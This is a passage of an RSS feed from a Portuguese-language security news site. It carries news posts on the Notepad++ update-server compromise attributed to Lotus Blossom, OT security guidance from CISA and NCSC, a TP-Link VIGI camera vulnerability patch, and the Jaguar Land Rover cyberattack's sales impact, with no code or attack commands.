<p class="wp-block-paragraph">Pesquisadores de segurança identificaram que o recente comprometimento do mecanismo de atualização do Notepad++ está associado a uma operação de ciberespionagem conduzida pelo grupo conhecido como <strong>Lotus Blossom</strong>, também rastreado por outras comunidades de pesquisa como <em>Lotus Panda</em> ou <em>Billbug</em>. O incidente chama atenção por explorar a cadeia de distribuição de software como vetor inicial de ataque, resultando na entrega de um backdoor inédito, denominado <strong>Chrysalis</strong>, a alvos cuidadosamente selecionados.</p>



<p class="wp-block-paragraph">O caso veio à tona após o próprio autor do Notepad++ informar que a infraestrutura responsável pelo serviço de atualização havia sido comprometida. De acordo com o relato, um servidor de hospedagem compartilhada foi acessado de forma indevida, permitindo que parte das solicitações legítimas de atualização fosse redirecionada, de maneira seletiva, para servidores sob controle dos atacantes. Nessas situações, usuários receberam instaladores maliciosos disfarçados como atualizações legítimas do software.</p>



<p class="wp-block-paragraph">Análises técnicas indicam que a campanha não teve caráter massivo. Ao contrário, o redirecionamento do tráfego foi feito de forma direcionada, atingindo apenas sistemas considerados de interesse pelos operadores da ameaça. Esse padrão reforça o perfil de uma campanha de espionagem, voltada a alvos de alto valor e alinhada ao histórico de atuação do grupo Lotus Blossom.</p>



<p class="wp-block-paragraph">Entre os setores tradicionalmente associados a atividades desse grupo estão organizações governamentais, empresas de telecomunicações, aviação, infraestrutura crítica e mídia, com registros de operações em países do Sudeste Asiático e, mais recentemente, da América Central.</p>



<p class="wp-block-paragraph">O Notepad++ foi utilizado como vetor inicial para a entrega do <strong>Chrysalis</strong>, um backdoor até então desconhecido, capaz de fornecer persistência no ambiente comprometido e abrir caminho para atividades de coleta de informações e controle remoto. Segundo avaliações independentes, trata-se de uma ferramenta sofisticada, projetada para permanência prolongada no endpoint e difícil detecção por mecanismos tradicionais.</p>



<p class="wp-block-paragraph">Em declaração à imprensa especializada, o autor do Notepad++, Don Ho, afirmou que não é possível confirmar oficialmente a autoria do ataque ou todos os detalhes técnicos do malware envolvido. Ainda assim, destacou que o modelo de comprometimento descrito por pesquisadores externos é compatível com o que foi observado durante a investigação do incidente, indicando um cenário plausível e tecnicamente consistente.</p>



<p class="wp-block-paragraph">Embora a forma exata de acesso inicial à infraestrutura de distribuição ainda não tenha sido completamente esclarecida, há indícios de que, uma vez obtido esse acesso, os atacantes passaram a distribuir versões adulteradas do software por meio de instaladores no formato <strong>NSIS</strong>, amplamente utilizados e conhecidos por também serem explorados em campanhas avançadas de ameaça.</p>



<p class="wp-block-paragraph">O incidente reforça um ponto crítico para organizações e usuários: ataques à <strong>cadeia de suprimentos de software</strong> continuam sendo uma das estratégias mais eficazes para contornar controles de segurança tradicionais. A exploração de mecanismos de atualização, em especial, amplia o impacto potencial do ataque e dificulta sua detecção precoce, tornando essenciais medidas adicionais de validação, monitoramento e resposta.</p>



<p class="wp-block-paragraph">É nesse contexto que entram as recomendações da Clavis, com foco em mitigação imediata, investigação de possíveis comprometimentos e fortalecimento dos controles de segurança relacionados à distribuição e atualização de software.</p>



<h2 id="h-recomendacoes-da-clavis" class="wp-block-heading">Recomendações da <a href="https://clavis.com.br/" target="_blank" rel="noreferrer noopener nofollow">Clavis</a></h2>



<p class="wp-block-paragraph" id="h-o-incidente-envolvendo-o-mecanismo-de-atualizacao-do-notepad-reforca-os-riscos-associados-a-ataques-a-cadeia-de-suprimentos-de-software-especialmente-quando-falhas-em-processos-de-validacao-e-distribuicao-sao-exploradas-de-forma-direcionada">O incidente envolvendo o mecanismo de atualização do Notepad++ reforça os riscos associados a ataques à cadeia de suprimentos de software, especialmente quando falhas em processos de validação e distribuição são exploradas de forma direcionada.</p>



<p class="wp-block-paragraph">No caso analisado, o comprometimento ocorreu na infraestrutura de atualização e não no código-fonte do software, o que evidencia a necessidade de controles adicionais sobre a integridade, autenticidade e monitoramento de processos de update — em especial em ambientes corporativos.</p>



<p class="wp-block-paragraph">Com base nas informações publicamente disponíveis até o momento, a Clavis recomenda:</p>



<ul class="wp-block-list">
<li>• <strong>Atualização imediata para a versão mais recente do Notepad++ (>= v8.9.1)</strong>, que inclui melhorias no mecanismo de atualização e validação de assinaturas;</li>



<li>• <strong>Inventário e revisão de endpoints</strong> que utilizem versões anteriores, com atenção especial a sistemas que possuam atualização automática habilitada;</li>



<li>• <strong>Análise de segurança aprofundada nos endpoints potencialmente expostos</strong>, priorizando a detecção de mecanismos de persistência, backdoors e execução de binários não autorizados;</li>



<li>• <strong>Revisão dos controles de supply chain de software</strong>, incluindo políticas de validação de atualizações, verificação de assinaturas digitais e restrições à execução de instaladores fora de repositórios confiáveis;</li>



<li>• <strong>Monitoramento contínuo e resposta a incidentes</strong>, garantindo visibilidade sobre comportamentos anômalos e capacidade de contenção rápida em caso de comprometimento.</li>
</ul>



<p class="wp-block-paragraph">Casos como esse demonstram que mecanismos legítimos de atualização continuam sendo alvos atrativos para campanhas avançadas de ameaça, reforçando a importância de uma abordagem estruturada de gestão de riscos, detecção e resposta em ambientes corporativos.</p>



<p class="wp-block-paragraph"></p>
<p>The post <a href="https://seginfo.com.br/2026/02/05/ataque-a-atualizacao-do-notepad-e-atribuido-ao-grupo-de-espionagem-lotus-blossom/">Ataque à atualização do Notepad++ é atribuído ao grupo de espionagem Lotus Blossom</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74230</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>CISA e parceiros internacionais lançam princípios de segurança para conectividade em OT</title>
		<link>https://seginfo.com.br/2026/01/30/cisa-e-parceiros-internacionais-lancam-principios-de-seguranca-para-conectividade-em-ot/</link>
		
		
		<pubDate>Fri, 30 Jan 2026 12:57:49 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74164</guid>

					<description><![CDATA[<p>Agências dos Estados Unidos, Reino Unido e parceiros globais divulgaram um novo conjunto de diretrizes para mitigar riscos cibernéticos em ambientes de tecnologia operacional (OT). A Cybersecurity and Infrastructure Security Agency (CISA), o National Cyber Security Centre do Reino Unido (NCSC-UK), o Federal Bureau of Investigation (FBI) e parceiros internacionais lançaram oficialmente os Secure Connectivity&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/01/30/cisa-e-parceiros-internacionais-lancam-principios-de-seguranca-para-conectividade-em-ot/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/01/30/cisa-e-parceiros-internacionais-lancam-principios-de-seguranca-para-conectividade-em-ot/">CISA e parceiros internacionais lançam princípios de segurança para conectividade em OT</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph"><strong>Agências dos Estados Unidos, Reino Unido e parceiros globais divulgaram um novo conjunto de diretrizes para mitigar riscos cibernéticos em ambientes de tecnologia operacional (OT).</strong></p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1645297175-1024x683.jpeg" alt="" class="wp-image-74167" style="aspect-ratio:1.4992888417882142;width:736px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1645297175-1024x683.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1645297175-300x200.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1645297175-150x100.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1645297175-768x512.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1645297175-1536x1024.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1645297175-2048x1365.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1645297175-1170x780.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1645297175-720x480.jpeg 720w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A Cybersecurity and Infrastructure Security Agency (CISA), o National Cyber Security Centre do Reino Unido (NCSC-UK), o Federal Bureau of Investigation (FBI) e parceiros internacionais lançaram oficialmente os <strong>Secure Connectivity Principles for Operational Technology</strong>, um guia estratégico voltado a organizações que operam ambientes OT. A iniciativa foi liderada pelo NCSC-UK e tem como objetivo ajudar empresas a reduzir riscos associados a conectividades expostas ou inseguras, protegendo redes contra ameaças cibernéticas sofisticadas, incluindo atores patrocinados por Estados-nação.</p>



<p class="wp-block-paragraph">Com a crescente interconectividade dos ambientes de OT — impulsionada por benefícios como análises em tempo real, monitoramento remoto e manutenção preditiva — também aumentam os riscos de intrusões cibernéticas capazes de causar danos físicos, impactos ambientais ou interrupções em serviços essenciais. O novo guia oferece um framework prático, com objetivos claros, para que operadores e proprietários de infraestruturas críticas possam projetar, implementar e manter conectividade segura em seus ambientes.</p>



<p class="wp-block-paragraph">Segundo Nick Andersen, diretor assistente executivo de cibersegurança da CISA, a publicação reforça o compromisso da agência em atuar de forma colaborativa com parceiros nacionais e internacionais. “Ao fornecer orientações práticas para que organizações de OT projetem, protejam e gerenciem a conectividade de seus ambientes, fortalecemos a defesa da infraestrutura crítica contra ameaças cibernéticas maliciosas e patrocinadas por Estados”, destacou. Andersen também reforçou a importância da adoção de princípios de <em>secure by design</em> por fabricantes e integradores de dispositivos OT, como forma mais eficaz de reduzir riscos desde a origem.</p>



<p class="wp-block-paragraph">O CTO do NCSC, Ollie Whitehouse, ressaltou que a segurança cibernética deve ser tratada como um requisito fundamental para garantir segurança física, disponibilidade e continuidade de serviços. “Desenvolvida em conjunto com parceiros internacionais e com ampla colaboração da indústria, a nova orientação oferece um framework claro e prático para reduzir a superfície de ataque e aumentar a resiliência dos sistemas conectados”, afirmou. Whitehouse recomendou que profissionais de OT em todo o mundo adotem os oito princípios definidos no guia para apoiar decisões estratégicas baseadas em segurança.</p>



<p class="wp-block-paragraph">Já Brett Leatherman, diretor assistente de cibersegurança do FBI, destacou que os sistemas de tecnologia operacional sustentam silenciosamente serviços essenciais utilizados diariamente pela população. “A conectividade segura desses sistemas é uma questão de importância nacional. Este guia conjunto reforça que ambientes OT são particularmente vulneráveis e cada vez mais visados, tornando a mitigação rápida e a defesa colaborativa fundamentais”, explicou.</p>



<p class="wp-block-paragraph">A CISA e seus parceiros internacionais recomendam que organizações avaliem seus ambientes de conectividade em OT e implementem as medidas de mitigação propostas no guia, fortalecendo a proteção da infraestrutura crítica frente a ameaças cibernéticas cada vez mais oportunistas e avançadas.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.cisa.gov/news-events/news/cisa-uk-ncsc-fbi-unveil-principles-combat-cyber-risks-ot" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/01/30/cisa-e-parceiros-internacionais-lancam-principios-de-seguranca-para-conectividade-em-ot/">CISA e parceiros internacionais lançam princípios de segurança para conectividade em OT</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74164</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Agências ocidentais alertam para o aumento das ameaças à tecnologia operacional industrial</title>
		<link>https://seginfo.com.br/2026/01/26/agencias-ocidentais-alertam-para-o-aumento-das-ameacas-a-tecnologia-operacional-industrial/</link>
		
		
		<pubDate>Mon, 26 Jan 2026 18:41:53 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74136</guid>

					<description><![CDATA[<p>Um alerta conjunto emitido por agências de cibersegurança ocidentais chama a atenção para a escalada das ameaças digitais direcionadas à tecnologia operacional (OT), responsável por sustentar sistemas industriais e infraestruturas críticas em todo o mundo. O aviso acompanha a publicação de novas orientações lideradas pelo National Cyber Security Centre (NCSC) do Reino Unido, órgão ligado&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/01/26/agencias-ocidentais-alertam-para-o-aumento-das-ameacas-a-tecnologia-operacional-industrial/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/01/26/agencias-ocidentais-alertam-para-o-aumento-das-ameacas-a-tecnologia-operacional-industrial/">Agências ocidentais alertam para o aumento das ameaças à tecnologia operacional industrial</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="559" src="https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1617591790-1024x559.jpeg" alt="" class="wp-image-74139" style="aspect-ratio:1.8318737860769414;width:766px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1617591790-1024x559.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1617591790-300x164.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1617591790-150x82.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1617591790-768x419.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1617591790-1536x838.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1617591790-2048x1117.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1617591790-1170x638.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1617591790-1877x1024.jpeg 1877w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1617591790-880x480.jpeg 880w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">Um alerta conjunto emitido por agências de cibersegurança ocidentais chama a atenção para a escalada das ameaças digitais direcionadas à tecnologia operacional (OT), responsável por sustentar sistemas industriais e infraestruturas críticas em todo o mundo.</p>



<p class="wp-block-paragraph">O aviso acompanha a publicação de novas orientações lideradas pelo <strong>National Cyber Security Centre (NCSC)</strong> do Reino Unido, órgão ligado ao serviço de inteligência GCHQ, que estabelece princípios para a conexão segura de equipamentos industriais à internet, como sistemas de controle industrial, sensores e outros serviços críticos.</p>



<p class="wp-block-paragraph">Essas tecnologias estão no centro de infraestruturas essenciais, incluindo centrais de geração de energia, estações de tratamento de água, linhas de produção industrial e redes de transporte. Historicamente isolados, muitos desses sistemas passaram a ser monitorados e gerenciados remotamente, ampliando a eficiência operacional — mas também a superfície de ataque explorada por agentes maliciosos.</p>



<p class="wp-block-paragraph">Segundo as agências envolvidas na elaboração das orientações, um número crescente e cada vez mais diverso de atores tem direcionado ataques a ambientes industriais, que vão desde grupos de ransomware até cibercriminosos apoiados por Estados-nação.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“As conexões OT expostas e inseguras são alvos conhecidos tanto de atores oportunistas quanto de adversários altamente sofisticados”, destaca o documento, que relembra um alerta conjunto emitido em junho de 2023 sobre operações cibernéticas patrocinadas pelo Estado chinês.</p>
</blockquote>



<p class="wp-block-paragraph">O material também faz referência a um alerta recente da <strong>Cybersecurity and Infrastructure Security Agency (CISA)</strong> dos Estados Unidos, atualizado no mês passado, indicando que hacktivistas pró-Rússia têm conduzido ataques oportunistas contra infraestruturas críticas em diferentes países.</p>



<p class="wp-block-paragraph">O guia foi coassinado por diversas entidades internacionais, incluindo a CISA e o FBI, os centros nacionais de cibersegurança dos Países Baixos e da Alemanha, além de parceiros da aliança <strong>Five Eyes</strong>, que reúne Austrália, Canadá e Nova Zelândia.</p>



<p class="wp-block-paragraph">Entre as principais recomendações estão a <strong>segmentação de redes</strong>, o uso de <strong>autenticação forte</strong>, a <strong>monitorização contínua</strong> e a <strong>redução ao mínimo dos acessos remotos</strong>, com o objetivo de prevenir ataques disruptivos capazes de afetar serviços essenciais e causar impactos no mundo físico.</p>



<p class="wp-block-paragraph">A urgência dessas medidas é reforçada por incidentes recentes. Em novembro do ano passado, a <em>Recorded Future News</em> revelou que cibercriminosos realizaram cinco ataques contra fornecedores de água potável no Reino Unido desde o início de 2024. As informações constam em relatórios encaminhados ao regulador do setor e parcialmente divulgados com base na legislação de acesso à informação.</p>



<p class="wp-block-paragraph">Embora nenhum dos ataques tenha comprometido diretamente o abastecimento de água, eles afetaram as organizações responsáveis pelo serviço. Trata-se do maior número de incidentes registrados em um intervalo de dois anos, reforçando os alertas das autoridades britânicas sobre o aumento das ameaças cibernéticas às infraestruturas críticas do país.</p>



<p class="wp-block-paragraph">Em comunicado que acompanha a divulgação das orientações, o diretor de tecnologia do NCSC, <strong>Ollie Whitehouse</strong>, destacou que é “vital que a cibersegurança seja tratada como um requisito fundamental para sustentar a segurança física, a continuidade dos serviços e a disponibilidade operacional”.</p>



<p class="wp-block-paragraph">“As novas orientações do NCSC, desenvolvidas em conjunto com parceiros internacionais e com ampla colaboração da indústria, oferecem um quadro claro e prático para projetar e manter conexões seguras, reduzir a superfície de ataque e fortalecer a resiliência”, afirmou.</p>



<p class="wp-block-paragraph">Whitehouse acrescentou ainda que as autoridades “recomendam fortemente que profissionais de OT em todo o mundo sigam os oito princípios-chave”, de modo a tomar decisões de segurança mais informadas, proteger serviços críticos e reforçar a confiança em sistemas cada vez mais interconectados.</p>



<p class="wp-block-paragraph">Para saber mais, <strong><a href="https://www.itsecurity.pt/news/news/agencias-ocidentais-alertam-para-ameacas-crescentes-a-tecnologia-operacional-industrial" target="_blank" rel="noreferrer noopener nofollow">clique aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/01/26/agencias-ocidentais-alertam-para-o-aumento-das-ameacas-a-tecnologia-operacional-industrial/">Agências ocidentais alertam para o aumento das ameaças à tecnologia operacional industrial</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74136</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>TP-Link corrige falha crítica que expunha câmeras VIGI a ataques remotos</title>
		<link>https://seginfo.com.br/2026/01/19/tp-link-corrige-falha-critica-que-expunha-cameras-vigi-a-ataques-remotos/</link>
		
		
		<pubDate>Mon, 19 Jan 2026 21:10:53 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74062</guid>

					<description><![CDATA[<p>A TP-Link corrigiu recentemente uma vulnerabilidade grave que poderia permitir que invasores assumissem o controle de mais de 32 modelos profissionais de câmeras de vigilância das linhas VIGI C e VIGI InSight. Identificada como CVE-2026-0629 e classificada com alta severidade, a falha foi detalhada em um comunicado oficial publicado pela fabricante na última semana. O&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/01/19/tp-link-corrige-falha-critica-que-expunha-cameras-vigi-a-ataques-remotos/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/01/19/tp-link-corrige-falha-critica-que-expunha-cameras-vigi-a-ataques-remotos/">TP-Link corrige falha crítica que expunha câmeras VIGI a ataques remotos</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="574" src="https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1207297376-1024x574.jpeg" alt="" class="wp-image-74065" style="width:786px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1207297376-1024x574.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1207297376-300x168.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1207297376-150x84.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1207297376-768x430.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1207297376-1536x861.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1207297376-2048x1148.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1207297376-1170x656.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1207297376-1827x1024.jpeg 1827w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1207297376-857x480.jpeg 857w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A TP-Link corrigiu recentemente uma vulnerabilidade grave que poderia permitir que invasores assumissem o controle de mais de 32 modelos profissionais de câmeras de vigilância das linhas <strong>VIGI C</strong> e <strong>VIGI InSight</strong>.</p>



<p class="wp-block-paragraph">Identificada como <strong>CVE-2026-0629</strong> e classificada com <strong>alta severidade</strong>, a falha foi detalhada em um comunicado oficial publicado pela fabricante na última semana. O problema está relacionado a um <strong>bypass de autenticação</strong> no recurso de recuperação de senha da interface web local das câmeras.</p>



<p class="wp-block-paragraph">De acordo com a TP-Link, a vulnerabilidade “permite que um invasor presente na rede local redefina a senha de administrador sem qualquer verificação, por meio da manipulação do estado do lado do cliente”, o que possibilita acesso administrativo completo ao dispositivo.</p>



<p class="wp-block-paragraph">A falha foi descoberta por <strong>Arko Dhar</strong>, cofundador e CTO da empresa de cibersegurança para IoT <strong>Redinent Innovations</strong>. Em entrevista ao portal <em>SecurityWeek</em>, Dhar explicou que um atacante poderia explorar a vulnerabilidade para obter acesso total à câmera, incluindo o feed de vídeo e todas as demais funcionalidades.</p>



<p class="wp-block-paragraph">O pesquisador alertou ainda que a exploração poderia ocorrer de forma remota e que, no momento da descoberta, em outubro de 2025, ele identificou mais de <strong>2.500 câmeras expostas à internet</strong> potencialmente vulneráveis em todo o mundo. No entanto, a análise considerou apenas um dos modelos afetados, o que indica que o número real de dispositivos expostos pode ser significativamente maior.</p>



<p class="wp-block-paragraph">As câmeras da linha VIGI da TP-Link são utilizadas por organizações em <strong>mais de 36 países e regiões</strong>, com forte presença na Europa, Sudeste Asiático e Américas.</p>



<p class="wp-block-paragraph">Embora seja comum que agentes maliciosos explorem vulnerabilidades em produtos da TP-Link, o catálogo de <strong>Vulnerabilidades Exploradas Conhecidas (KEV)</strong> da CISA lista atualmente cinco falhas exploradas em ataques reais — todas relacionadas a roteadores e repetidores de sinal da marca, e não a câmeras de vigilância.</p>



<p class="wp-block-paragraph">Ainda assim, ataques explorando falhas em câmeras de diferentes fabricantes são recorrentes no ambiente de ameaças. Por isso, especialistas alertam que organizações não devem ignorar a vulnerabilidade recém-divulgada e devem garantir que seus dispositivos estejam atualizados com as correções mais recentes.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/tp-link-patches-vulnerability-exposing-vigi-cameras-to-hacking/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/01/19/tp-link-corrige-falha-critica-que-expunha-cameras-vigi-a-ataques-remotos/">TP-Link corrige falha crítica que expunha câmeras VIGI a ataques remotos</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74062</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Ataque cibernético provoca queda de 43% nas vendas da Jaguar Land Rover</title>
		<link>https://seginfo.com.br/2026/01/08/ataque-cibernetico-provoca-queda-de-43-nas-vendas-da-jaguar-land-rover/</link>
		
		
		<pubDate>Thu, 08 Jan 2026 20:58:27 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73981</guid>

					<description><![CDATA[<p>A Jaguar Land Rover (JLR) registrou uma forte retração em suas vendas no terceiro trimestre do ano fiscal de 2026. De acordo com o relatório trimestral mais recente da montadora, o volume de vendas no atacado caiu 43,3% em comparação com o mesmo período do ano anterior, totalizando 59.200 unidades — número que exclui a&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/01/08/ataque-cibernetico-provoca-queda-de-43-nas-vendas-da-jaguar-land-rover/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/01/08/ataque-cibernetico-provoca-queda-de-43-nas-vendas-da-jaguar-land-rover/">Ataque cibernético provoca queda de 43% nas vendas da Jaguar Land Rover</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="559" src="https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_311695300-1024x559.jpeg" alt="" class="wp-image-73983" style="aspect-ratio:1.8318737860769414;width:772px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_311695300-1024x559.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_311695300-300x164.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_311695300-150x82.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_311695300-768x419.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_311695300-1536x838.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_311695300-2048x1117.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_311695300-1170x638.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_311695300-1877x1024.jpeg 1877w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_311695300-880x480.jpeg 880w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A Jaguar Land Rover (JLR) registrou uma forte retração em suas vendas no terceiro trimestre do ano fiscal de 2026. De acordo com o relatório trimestral mais recente da montadora, o volume de vendas no atacado caiu 43,3% em comparação com o mesmo período do ano anterior, totalizando 59.200 unidades — número que exclui a joint venture Chery JLR China.</p>



<p class="wp-block-paragraph">A queda expressiva é atribuída principalmente a um ataque cibernético ocorrido no início do trimestre, que afetou diretamente as operações da empresa, além da descontinuação estratégica de modelos antigos da Jaguar, como parte da preparação para o lançamento de uma nova geração de veículos.</p>



<h3 class="wp-block-heading" id="h-vendas-caem-em-todos-os-principais-mercados">Vendas caem em todos os principais mercados</h3>



<p class="wp-block-paragraph">O impacto também foi sentido no varejo. As vendas ao consumidor final recuaram 25,1% na comparação anual, alcançando 79.600 unidades no trimestre. Todos os principais mercados globais da JLR apresentaram retração.</p>



<p class="wp-block-paragraph">Na América do Norte, os volumes de atacado despencaram 64,4%. A Europa registrou queda de 47,6%, enquanto a China teve redução de 46%. O Reino Unido foi o mercado menos afetado, com uma diminuição marginal de 0,9% nos volumes de atacado.</p>



<h3 class="wp-block-heading" id="h-ataque-cibernetico-afetou-producao-e-logistica">Ataque cibernético afetou produção e logística</h3>



<p class="wp-block-paragraph">Segundo a Jaguar Land Rover, a produção só começou a retornar aos níveis normais em meados de novembro, semanas após o incidente cibernético. Além da paralisação inicial, a empresa enfrentou atrasos adicionais na distribuição dos veículos para os mercados globais, o que contribuiu para a redução dos volumes no trimestre.</p>



<p class="wp-block-paragraph">Outro fator que agravou o cenário foi o aumento das tarifas impostas pelos Estados Unidos sobre exportações de veículos, elevando custos e dificultando ainda mais o desempenho comercial da montadora.</p>



<h3 class="wp-block-heading" id="h-modelos-premium-seguem-como-pilar-da-empresa">Modelos premium seguem como pilar da empresa</h3>



<p class="wp-block-paragraph">Apesar do trimestre desafiador, os modelos Range Rover, Range Rover Sport e Defender continuam sendo os principais pilares da JLR. Juntos, eles responderam por 74,3% do volume total de vendas no atacado, reforçando a estratégia da empresa de focar em veículos premium e de maior margem.</p>



<p class="wp-block-paragraph">A Jaguar Land Rover informou que divulgará os resultados financeiros completos do terceiro trimestre do ano fiscal de 2026 em fevereiro de 2026, quando devem ser apresentados mais detalhes sobre os impactos do ataque cibernético e as perspectivas para os próximos meses.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.cisoadvisor.com.br/ataque-derrubou-43-nas-vendas-da-jaguar-land-rover/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/01/08/ataque-cibernetico-provoca-queda-de-43-nas-vendas-da-jaguar-land-rover/">Ataque cibernético provoca queda de 43% nas vendas da Jaguar Land Rover</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73981</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Violação de dados na Covenant Health afeta mais de 478 mil pessoas</title>
		<link>https://seginfo.com.br/2026/01/02/violacao-de-dados-na-covenant-health-afeta-mais-de-478-mil-pessoas/</link>
		
		
		<pubDate>Fri, 02 Jan 2026 13:19:11 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
